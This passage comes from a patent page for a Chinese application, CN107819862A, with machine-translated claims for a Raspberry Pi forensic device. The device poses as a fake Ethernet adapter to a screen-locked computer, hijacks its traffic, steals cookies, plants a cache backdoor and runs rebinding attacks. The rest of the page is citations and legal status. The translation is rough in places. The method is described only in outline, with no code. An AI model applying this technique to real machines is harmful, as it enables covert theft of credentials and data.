Kidnap the LAN routing iinformation being connected with the goal systems;
Destination server is determined according to the LAN routing iinformation, wherein, the destination server is and the local networking By server corresponding with target routing iinformation in information, the target routing iinformation is that the LAN routing iinformation is neutral The best information of energy;
Caching back door is forced on the destination server, is attacked with generating permanent heavy binding;
The target information is obtained based on the permanent heavy binding attack.
6. a kind of swift electron apparatus for obtaining evidence based on Raspberry Pi, it is characterised in that applied to Raspberry Pi end, described device bag Include:
Module is kidnapped, for kidnapping the networking traffic for the goal systems being under screen lock state, wherein, the goal systems For suspect's system;
Module is stolen, for stealing the cookie information and routing iinformation of the goal systems based on the networking traffic;
Binding attack module again, for according to the cookie information and the routing iinformation, by outbound modes to institute State goal systems and bound attack again, to obtain target information, and the target information is sent to the terminal of evidence obtaining personnel, Wherein, the target information is the information related to suspect's crime.
7. device according to claim 6, it is characterised in that described device also includes:
Back door cache module, for forcing caching back door in the network environment of the goal systems, so that the evidence obtaining personnel The target information is obtained by accessing the back door.
8. device according to claim 6, it is characterised in that the abduction module includes:
First access unit, for accessing the goal systems according to the access operation of the evidence obtaining personnel, with the falseness that disguises oneself as Ethernet;
Second access unit, for the goal systems to be accessed into the false Ethernet, to kidnap the net of the goal systems Network connection traffic.
9. device according to claim 6, it is characterised in that the module of stealing includes:
Monitoring unit, after in the goal systems by browser transmission access request, based on the networking traffic Monitor the access response of the access request and the access request;
First acquisition unit, for obtaining the cookie letters of the goal systems based on the access request and the access response Breath and routing iinformation, wherein, the cookie information includes the id information goal systems when conducting interviews, encrypted message And info web;The routing information that the routing iinformation passes through for the goal systems when conducting interviews, the routing information Including at least following any:Internal IP, node server, label.
10. a kind of electronic equipment, including memory, processor, it is stored with and can runs on the processor on the memory Computer program, it is characterised in that realized described in the computing device during computer program in the claims 1 to 5 The step of method described in any one.
CN201711134861.9A 2017-11-15 2017-11-15 Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi Pending CN107819862A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201711134861.9A CN107819862A (en) 2017-11-15 2017-11-15 Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201711134861.9A CN107819862A (en) 2017-11-15 2017-11-15 Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi

Publications (1)

Publication Number Publication Date
CN107819862A true CN107819862A (en) 2018-03-20

Family

ID=61609839

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201711134861.9A Pending CN107819862A (en) 2017-11-15 2017-11-15 Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi

Country Status (1)

Country Link
CN (1) CN107819862A (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN110536305A (en) * 2019-08-29 2019-12-03 武汉赛可锐信息技术有限公司 Wi-Fi hotspot methods of investigation, device, terminal device and storage medium
CN111881384A (en) * 2020-07-02 2020-11-03 北京华赛在线科技有限公司 Illegal external connection evidence obtaining method, system and storage medium
CN112583848A (en) * 2020-12-25 2021-03-30 南京联成科技发展股份有限公司 Remote security log analysis system

Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US7610400B2 (en) * 2004-11-23 2009-10-27 Juniper Networks, Inc. Rule-based networking device
CN106130957A (en) * 2016-06-08 2016-11-16 山东师范大学 Police long-range WiFi network investigation evidence-obtaining system based on Fructus Rubi group and method thereof
CN106227780A (en) * 2016-07-18 2016-12-14 中国科学院信息工程研究所 Automatization's sectional drawing evidence collecting method of a kind of magnanimity webpage and system
US20170199736A1 (en) * 2016-01-07 2017-07-13 Ca, Inc. Transactional boundaries for software system profiling

Patent Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US7610400B2 (en) * 2004-11-23 2009-10-27 Juniper Networks, Inc. Rule-based networking device
US20170199736A1 (en) * 2016-01-07 2017-07-13 Ca, Inc. Transactional boundaries for software system profiling
CN106130957A (en) * 2016-06-08 2016-11-16 山东师范大学 Police long-range WiFi network investigation evidence-obtaining system based on Fructus Rubi group and method thereof
CN106227780A (en) * 2016-07-18 2016-12-14 中国科学院信息工程研究所 Automatization's sectional drawing evidence collecting method of a kind of magnanimity webpage and system

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
CLOUDS: ""30秒攻破任意密码保护的PC:深入了解5美元黑客神器PoisonTap"", 《WWW.FREEBUF.COM/SECTOOL/120354.HTML》 *

Cited By (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN110536305A (en) * 2019-08-29 2019-12-03 武汉赛可锐信息技术有限公司 Wi-Fi hotspot methods of investigation, device, terminal device and storage medium
CN110536305B (en) * 2019-08-29 2023-09-12 武汉赛可锐信息技术有限公司 WiFi hot spot detection method and device, terminal equipment and storage medium
CN111881384A (en) * 2020-07-02 2020-11-03 北京华赛在线科技有限公司 Illegal external connection evidence obtaining method, system and storage medium
CN111881384B (en) * 2020-07-02 2023-05-26 北京华赛在线科技有限公司 Evidence obtaining method, system and storage medium for illegal external connection
CN112583848A (en) * 2020-12-25 2021-03-30 南京联成科技发展股份有限公司 Remote security log analysis system

Similar Documents

Publication Publication Date Title
US10826872B2 (en) Security policy for browser extensions
Wu et al. Effective defense schemes for phishing attacks on mobile computing platforms
USRE45139E1 (en) Method and apparatus for cross-domain communication using designated response processing page
US20170243003A1 (en) Identifying bots
CN104429110B (en) Communication method and device
US10931686B1 (en) Detection of automated requests using session identifiers
EP3021551A1 (en) Method of identifying and counteracting internet attacks
CN111866124B (en) Method, device, server and machine-readable storage medium for accessing webpage
CN105659520A (en) Secure proxy to protect private data
CN103607385A (en) Method and apparatus for security detection based on browser
CN101682626A (en) Method and system for simulating a hacking attack on a network
CN106453216A (en) Malicious website interception method, malicious website interception device and client
CN109150874A (en) Access authentication method, device and authenticating device
CN107819862A (en) Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi
GB2516972A (en) Validating DDoS attacks based on social media content
CN110430188A (en) A kind of quick url filtering method and device
CN112532605B (en) Network attack tracing method and system, storage medium and electronic device
CN109617917A (en) Address virtual Web application security firewall methods, devices and systems
CN106576051A (en) Zero day threat detection using host application/program to user agent mapping
CN110099129A (en) A kind of data transmission method and equipment
CN105337776B (en) Method and device for generating website fingerprint and electronic equipment
CN108781367A (en) The method for reducing Cookie injection and Cookie Replay Attacks
CN106230781A (en) The method and device preventing network attack of sing on web authentication techniques
CN104243488B (en) A kind of login authentication method of inter-network site server
CN111147625B (en) Method, device and storage medium for acquiring local external network IP address

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
RJ01 Rejection of invention patent application after publication
RJ01 Rejection of invention patent application after publication

Application publication date: 20180320